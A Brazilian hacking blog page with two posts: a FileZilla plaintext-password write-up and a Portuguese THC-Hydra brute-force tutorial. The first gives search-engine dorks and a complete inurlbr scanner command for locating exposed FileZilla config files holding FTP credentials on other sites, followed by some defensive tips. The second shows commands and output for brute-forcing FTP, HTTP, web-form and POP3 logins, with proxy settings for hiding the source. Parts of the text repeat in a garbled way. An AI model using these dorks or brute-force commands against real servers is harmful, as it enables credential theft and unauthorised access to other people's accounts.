Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador ftp. Mostrar todas as postagens
Mostrando postagens com marcador ftp. Mostrar todas as postagens

domingo, 2 de agosto de 2015

Accessing sensitive data FileZilla

FileZilla FTP Passwords now Stored in Plaintext.

It's an old vulnerability FileZilla, but we can still find servers with such a security breach, Vulnerability allows access to sensitive files from the server. Containing passwords and FTP users.  FileZilla version ~ 3.0.9.2+ (and possibly older) store all FTP connection data .xml files in plain text.  The following files are what you need to know about:  filezilla.xml – Stores most recent server info including password in plaintext. recentservers.xml – Stores all recent server info including password in plaintext. sitemanager.xml – Stores all saved sites server info including password in plaintext.  These files can usually be found in the following directories: Windows XP/2K: "C:\Documents and Settings\username\Application Data\FileZilla" Windows Vista: "C:\Users\username\AppData\Roaming\FileZilla\" Linux: "/home/username/.filezilla/"  FileZilla configuration files FileZilla is a cross-platform application. That’s why it stores its settings in platform-neutral XML files.

It's an old vulnerability FileZilla, but we can still find servers with such a security breach, Vulnerability allows access to sensitive files from the server. Containing passwords and FTP users.

FileZilla version ~ 3.0.9.2+ (and possibly older) store all FTP connection data .xml files in plain text.

The following files are what you need to know about:

filezilla.xmlStores most recent server info including password in plaintext.
recentservers.xmlStores all recent server info including password in plaintext.
sitemanager.xmlStores all saved sites server info including password in plaintext.

These files can usually be found in the following directories:
Windows XP/2K: "C:\Documents and Settings\username\Application Data\FileZilla"
Windows Vista: "C:\Users\username\AppData\Roaming\FileZilla\"
Linux: "/home/username/.filezilla/"

FileZilla configuration files
FileZilla is a cross-platform application. That’s why it stores its settings in platform-neutral XML files.
FileZilla configuration files FileZilla is a cross-platform application. That’s why it stores its settings in platform-neutral XML files.

sitemanager.xml 
The XML files are readable for reading with access data, As you can see, everything is stored in plain text, including the password.
sitemanager.xml  The XML files are readable for reading with access data, As you can see, everything is stored in plain text, including the password.
filezilla.xml
The filezilla.xml file follow the same example sitemanager.xml, It starts with naming <LastServer>
filezilla.xml The filezilla.xml file follow the same example sitemanager.xml, It starts with naming <LastServer>
Quick connect 
QuickConnect lets you connect to servers without adding them to your administrative panel. when instaciado a fast connection it is added in recentservers.xml file.

Danger?
Yes the same way that you can read these files. Malicious applications can do the same, and can be read also on web servers.
ex:
www.target.com.br/folder/{file.xml}
www.target.com.br/microsite/geo243/FileZilla.xml www.target.com.br/149224/prg/programok/Total%20Commander/FileZilla/recentservers.xml

Other files:
  1. sitemanager.xml
  2. recentservers.xml
  3. filezilla.xml
  4. bookmarks.xml
  5. filters.xml
  6. layout.xml
  7. queue.xml
Looking for vulnerable servers
Now let's use the inurlbr tool to search sites with such breach and confirm such information.
Download tool: 
https://github.com/googleinurl/SCANNER-INURLBR

Setting command:
using search engines..

SET DORK:
Choose your dork search

  • "\FileZilla\" ext:xml
  • inurl:"\FileZilla\" & inurl:sitemanager.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:recentservers.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:filezilla.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:bookmarks.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:filters.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:layout.xml -github -sourceforge
  • inurl:"\FileZilla\" & inurl:queue.xml -github -sourceforge
  • inurl:sitemanager.xml & ext:xml & -github -sourceforge
  • inurl:recentservers.xml & ext:xml & -github -sourceforge
  • inurl:filezilla.xml & ext:xml & -github -sourceforge
  • inurl:bookmarks.xml & ext:xml & -github -sourceforge
  • inurl:filters.xml & ext:xml & -github -sourceforge
  • inurl:layout.xml & ext:xml & -github -sourceforge
  • inurl:queue.xml & ext:xml & -github -sourceforge
  • inurl:"\FileZilla\" & inurl:(sitemanager.xml | recentservers.xml | filezilla.xml | filters.xml | bookmarks.xml | layout.xml | queue.xml) ext:xml -github -sourceforge
--dork 'YOU_DORK'
- Setting: --dork '"\FileZilla\" ext:xml'

SET FILE OUTPUT:
- Setting: -s filezilla.txt

SET TIPE VALIDATION: 
- Setting: -t
   2 The second type tries to valid the error defined by: -a 'VALUE_INSIDE_THE _TARGET' It    also establishes connection with the exploit through the get method.

SET STRING VALIDATION:
Specify the string that will be used on the search script:
   Example: -a {string}
   Usage:    -a '<title>hello world</title>'
   If specific value is found in the target he is considered vulnerable.
Setting:     -a '<FileZilla3>'
All filezilla file there is a primary tag called <FileZilla3>. It is trough this that we will validate.
Ex:
All filezilla file there is a primary tag called <FileZilla3>. It is trough this that we will validate. Ex:


Full command - using search engines:
php inurlbr.php --dork '"\FileZilla\" ext:xml' -s filezilla.txt -t 2 -a '<FileZilla3>'

OR SCANNER DORKING-FILE:
php inurlbr.php --dork-file dorks.txt -s filezilla.txt -t 2 -a '<FileZilla3>'

OUTPUT PRINT:
Full command - using search engines: php inurlbr.php --dork '"\FileZilla\" ext:xml' -s filezilla.txt -t 2 -a '<FileZilla3>'  OUTPUT PRINT:




Using FileZilla the safe way

FileZilla is a great FTP client and I use it myself. But since it doesn’t protect your FTP credentials, you should protect them yourselves. Here is what you can do:

1. Don’t use the “Normal” logon type. There are the “Ask for password” and the “Interactive” types that won’t save your passwords on disk. So malware simply won’t be able to get enough information from FileZilla configuration files to hack your sites.

Pros
Malware cannot steal your FTP credential from configuration files.

Cons
You’ll have to enter your password every time you connect to your site.
It won’t save you from more sophisticated spyware such as keyloggers and traffic sniffers. But I hope this sort of trojans can be better detected by you antivirus tools since they need to hook known system functions. To protect yourself from traffic sniffers, always use SFTP instead of FTP (if possible).

2. Hosts trick. If you manage multiple web sites, interactive logon types may be really inconvenient. There is a trick that can let you use the “Normal” logon type in a more secure manner. You should create aliases of your sites’ addresses in the “hosts” file (on Windows, you can find it in C:\WINDOWS\system32\drivers\etc\).

For example you have a site “example.com” with an IP-address "208.xxx.188.166".
To create an alias you need to add the following line into the hosts file:

208.xxx.188.166         my_example

"my_example" will work the same way as “example.com” when you use it on your computer.
However, on other computers it won’t make any sense. Now use this alias in FTP connection settings instead of “example.com”.
If hackers manage to steal your FTP credentials, all they’ll have will be: (host: my_example, user: unmask, password: parasites) – the username/password pair is valid, but the host name doesn’t make any sense to them. It’s like having a key and not knowing where the door is.

Pros
Once you have added new aliases to the hosts file and to FileZilla Site Manager, you can enjoy the ease of one-click connections.
Cons

This trick will only work as long as malware steals FTP credentials from configuration files verbatim (and I have proofs that at least some malware steal the data verbatim).  If they only add a simple check that converts host names to IP-addresses before sending the credentials to their central database, the trick will be useless.  This trick is better than no protection at all, but you should not count on it.
You’ll need to update the hosts file if IP-addresses change.

3. Public Key Authentication. If your hosting plan included SSH (secure shell), you can use FileZilla in SFTP mode. One of convenient SSH features is public key authentication. And FileZilla supports this type of authorization (I didn’t use it myself, but at least have seen the UI in the “Settings” dialog). FileZilla recognizes PuTTY’s Pageant, so the configuration should be easy if you already use PuTTY for SSH.

Pros
Secure one-click connections.

Cons

This authentication method will only work if your hosting plan includes SSH/SFTP. Unfortunately, this option is rearly included into shared hosting plans.
Creating the keys and configuring FileZilla to use them is not a trivial process.
You might still have to enter a pass phrase when adding keys to the Pageant.
Other FTP programs

In this article I reviewed FileZilla only because it’s a popular FTP client that I have on my computer and it was very easy to demonstrate how little it does to protect users’ FTP credentials. However the same concerns apply to all other  programs that have FTP functions: classical FTP clients, web page editors, file managers. Popular applications like DreamWeaver, CuteFTP, Total Commander, etc. account for majority of FTP credentials leaks.

Solution Source: http://blog.unmaskparasites.com/2009/09/01/beware-filezilla-doesnt-protect-your-ftp-passwords/

Referencias:
http://seclists.org/fulldisclosure/2008/Apr/508
http://blog.unmaskparasites.com/2009/09/01/beware-filezilla-doesnt-protect-your-ftp-passwords/
http://bl0wj0bb3r.blogspot.com.br/2015/08/d3lphi-filezilla-password-stealer.html
http://unsharptech.com/2008/05/20/filezilla-ftp-passwords-stored-in-plaintext/

domingo, 15 de setembro de 2013

TUTORIAL BÁSICO THC-HYDRA [PT-BR]

Tutorial Thc-Hydra

TUTORIAL BASICO THC-HYDRA [PT-BR]

 _   _               _               _           
| |_| |__   ___     | |__  _   _  __| |_ __ __ _ 
| __| '_ \ / __|____| '_ \| | | |/ _` | '__/ _` |
| |_| | | | (_|_____| | | | |_| | (_| | | | (_| |
 \__|_| |_|\___|    |_| |_|\__, |\__,_|_|  \__,_|
                           |___/    TUTORIAL BASICO THC-HYDRA [PT-BR]


_________________________________________________________________________________
- Por : MDH3LL
- Contato : [email protected]
- Data 10/04/2010
_________________________________________________________________________________


INDICE :
_________________________________________________________________________________
-0x00 - Instalando THC-HYDRA no (Windows XP).
-0x01 - Executando.
-0x02 - Opções.
-0x03 - Exemplos{
 -- Exemplo (1) FTP
 -- Exemplo (2) http-head
 -- Exemplo (3) http-post-form
 -- Exemplo (4) POP3
-0x04 - Proxy.
_________________________________________________________________________________

* THC-Hydra:Open Source/Multiplataforma/
* Desenvolvido por uma organização Alemã chamada "The Hacker's Choice"(THC).
* O Programa pode ser adquirido gratuitamente no site oficial do projeto : http://freeworld.thc.org/thc-hydra/

Hydra usa um mecanismo de FORÇA BRUTA/BRUTE FORCE (ou busca exaustiva):
Este tipo de ataque consiste em fazer o programa trabalhar exaustivamente tentando combinações de 
senhas e nomes de usuários ate chegar ao seu objetivo obvio.

Protocolos suportados atualmente na versão 5.4:
TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC,
RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS,
ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable
=================================================================================
[0x00] Instalando THC-HYDRA no (Windows XP) :
=================================================================================
O Primeiro passo é fazer o download da V.Win32/Cywin do programa no site oficial,descompactar e rodar.

-> Criar uma variável de ambiente em :
painel de controle > sistema > aba avançado > variáveis de ambiente e adicionando o caminho em path.
exemplo: C:\hydra-5.4-win;

=================================================================================
[0x01] Executando :
=================================================================================
Rode 'hydra' no prompt de comandos para chamar o programa.

/////////////////////////////////////////////////////////////////////////////////
C:\Documents and Settings\user\Desktop>hydra
Hydra v5.4 [http://www.thc.org] (c) 2006 by van Hauser / THC 

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
 [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
 server service [OPT]

Options:
  -R        restore a previous aborted/crashed session
  -S        connect via SSL
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE try password PASS, or load several passwords from FILE
  -e ns     additional checks, "n" for null password, "s" try login as pass
  -C FILE   colon seperated "login:pass" format, instead of -L/-P options
  -M FILE   server list for parallel attacks, one entry per line
  -o FILE   write found login/password pairs to FILE instead of stdout
  -f        exit after the first found login/password pair (per host if -M)
  -t TASKS  run TASKS number of connects in parallel (default: 16)
  -w TIME   defines the max wait time in seconds for responses (default: 30)
  -v / -V   verbose mode / show login+pass combination for each attempt
  server    the target server (use either this OR the -M option)
  service   the service to crack. Supported protocols: telnet ftp pop3[-ntlm]
imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco
cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5
rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere
teamspeak sip vmauthd
  OPT       some service modules need special input (see README!)

Use HYDRA_PROXY_HTTP/HYDRA_PROXY_CONNECT and HYDRA_PROXY_AUTH env for a proxy.
Hydra is a tool to guess/crack valid login/password pairs - use allowed only
for legal purposes! If used commercially, tool name, version and web address
must be mentioned in the report. Find the newest version at http://www.thc.org
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Podemos ver acima que quando executado exibe informações como versão,sintaxe de uso e 
as opções seguidas de comentários.

=================================================================================
[0x02] Opções :
=================================================================================

 -R Restaura sessões abordadas/quebradas.
 -S Conexão segura usando SSL caso seja necessário.
 -s Especifica qual porta o hydra vai estabelecer a conexão.
 -l Nome|login da vitima.
 -L Carrega uma lista contendo nomes|logins de vitimas.(1 por linha)
 -p Especifica senha única.
 -P Carrega uma lista com senhas.(1 por linha)
 -e ns adcional 'n' testa senha em branco || adicional 's' testa user como pass.
 -C Usado para carregar um arquivo contendo usuário:senha. formato usuário:senha equivale a -L/-P.
 -M Carrega lista de servidores alvos.(1 por linha)
 -o Salva as senhas encontradas dentro do arquivo que você especificar.
 -f Faz o programa parar de trabalhar quando a senha||usuário for encontrada[o].
 -t Limita o numero de solicitações por vez.(default: 16)
 -w Define o tempo máximo em segundos para esperar resposta do serv.(default: 30s)
 -v / -V Modo verbose do programa. 'V' mostra todas tentativas.

Server: Servidor alvo. 
Exemplos: 
 127.0.0.1
 localhost
 pop.gmail.com
 pop.mail.yahoo.com.br 
 pop3.live.com 

Service: Protocolo||Serviço que sera chamado|usado.
Exemplos:
 pop3
 ftp
 smtp
 vnc 
 imap
 http-head
 http-post-form

=================================================================================
[0x03] Exemplos:
=================================================================================
Colocarei na pratica as opções já explicadas no índice [0x02] deste tutorial. 

Exemplo (1) FTP
=================================================================================
Sintaxe:
---------------------------------------------------------------------------------
hydra -l root -P pass.txt -s 21 localhost ftp
---------------------------------------------------------------------------------

Saida:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-08-17 21:23:57
[DATA] 16 tasks, 1 servers, 23 login tries (l:1/p:23), ~1 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 127.0.0.1   login: root   password: chaw123
[STATUS] attack finished for localhost (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2009-08-17 21:24:34
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

*[21][ftp] host: 127.0.0.1   login: root   password: chaw123 -> Esta saída mostra que foi encontrado a senha:chaw123
pertencente ao usuário root.


Exemplo (2) http-head
=================================================================================
Sintaxe:
---------------------------------------------------------------------------------
hydra -L users.txt -P pass.txt -o saida.txt localhost http-head /xampp/
---------------------------------------------------------------------------------

Saida:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-28 00:40:56
[DATA] 16 tasks, 1 servers, 266 login tries (l:14/p:19), ~16 tries per task
[DATA] attacking service http-head on port 80
[80][www] host: 127.0.0.1   login: root   password: Est2yu
[STATUS] attack finished for localhost (waiting for childs to finish)
select: Bad file descriptor
Hydra (http://www.thc.org) finished at 2010-01-28 00:41:00
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

O Hydra encontrou usuario:root||senha:Est2yu e fez o favor de salvar no arquivo 'saida.txt'.

Dentro do arquivo foi escrito as seguintes linhas pelo programa:
---------------------------------------------------------------------------------
# Hydra v5.4 run at 2010-01-27 19:59:59 on localhost http-head (hydra -L users.txt -P
 pass.txt -o saida.txt localhost http-head)
[80][www] host: 127.0.0.1   login: root password: Est2yu
---------------------------------------------------------------------------------
/xammp/ é o caminho/path -> http://localhost/xammp/


Exemplo (3) http-post-form
=================================================================================
Sintaxe:
---------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o saida.txt -t 1 -f 127.0.0.1
 http-post-form "index.php:nome=^USER^&senha=^PASS^:invalido"
---------------------------------------------------------------------------------

Saida:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-27 23:19:33
[DATA] 1 tasks, 1 servers, 19 login tries (l:1/p:19), ~19 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1   login: admin   password: admin
[STATUS] attack finished for 127.0.0.1 (valid pair found)
Hydra (http://www.thc.org) finished at 2010-01-27 23:19:33
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

-> Para criar esta sintaxe tive que olhar o código da pagina >>
---------------------------------------------------------------------------------

---------------------------------------------------------------------------------

 __________________________________________________________
|__Mozilla Firefox___________________________________|-|_|X|
|                                                          |
|                                                          |
|                                                          |
|                                                          |
|           _____________________________________          |
|          |               nome                  |         |
|          |_____________________________________|         |
|           _____________________________________          |
|          |               senha                 |         |
|          |_____________________________________|         |
|                                                          |
|                     ________________                     |
|                    |     Enviar     |                    |
|                    |________________|                    |
|                                                          |
|__________________________________________________________|
|_Concluído________________________________________________|

-> POST index.php nome=^USER^&senha=^PASS^&boo=Enviar
-> Use o complemento 'live HTTP headers' para Firefox que com toda certeza facilitara bastante sua vida.
-> Quando envio dados errados a pagina me retorna 'invalido' no titulo.
---------------------------------------------------------------------------------
invalido
---------------------------------------------------------------------------------

Complete ->
---------------------------------------------------------------------------------
hydra -l [usuário] -P [lista-senhas] -o saida.txt -t 1 -f [host] http-post-form
"[destino]:[nome_da_variável]=^USER^&[nome_da_variável]=^PASS^:[frase de erro]"
---------------------------------------------------------------------------------

Completo ->
---------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o saida.txt -t 1 -f 127.0.0.1 http-post-form "index.php:nome=^USER^&senha=^PASS^:invalido"
---------------------------------------------------------------------------------

Sendo que ^USER^ e ^PASS^ sera completado pelo hydra durante o loop que ele vai fazer testando senha por senha.
-> ^USER^ = admin e ^PASS^ = $_ <- -="" exemplo="" outro=""> http://localhost/login/login.html
-> Codigo fonte da pagina >>
---------------------------------------------------------------------------------

---------------------------------------------------------------------------------

Sintaxe:
---------------------------------------------------------------------------------
hydra -l admin -P pass.txt localhost http-post-form "/login/login_vai.php:login=^USER^&senha=^PASS^:Senha inválida!"
---------------------------------------------------------------------------------

Saida:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-04-11 00:31:02
[DATA] 1 tasks, 1 servers, 11 login tries (l:1/p:11), ~11 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1   login: admin   password: teste
[STATUS] attack finished for localhost (valid pair found)
Hydra (http://www.thc.org) finished at 2010-04-11 00:31:07
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\


Exemplo (4) POP3
=================================================================================
Sintaxe:
---------------------------------------------------------------------------------
hydra -L users.txt -p 123456 -S pop3.xxx.com pop3
---------------------------------------------------------------------------------

Saida:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-28 00:55:28
[DATA] 9 tasks, 1 servers, 9 login tries (l:9/p:1), ~1 tries per task
[DATA] attacking service pop3 on port 110
[STATUS] attack finished for pop3.xxx.com (waiting for childs to finish)
[110][pop3] host: pop3.xxx.com   login: [email protected] password: 123456
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\


=================================================================================
[0x04] Proxy:
=================================================================================

Proxy web:
---------------------------------------------------------------------------------
HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"
---------------------------------------------------------------------------------

Para qualquer outro use : HYDRA_PROXY_CONNECT
---------------------------------------------------------------------------------
HYDRA_PROXY_CONNECT=proxy.anonymizer.com:8000
---------------------------------------------------------------------------------

Com autentificação :
---------------------------------------------------------------------------------
HYDRA_PROXY_AUTH="nome:senha"
---------------------------------------------------------------------------------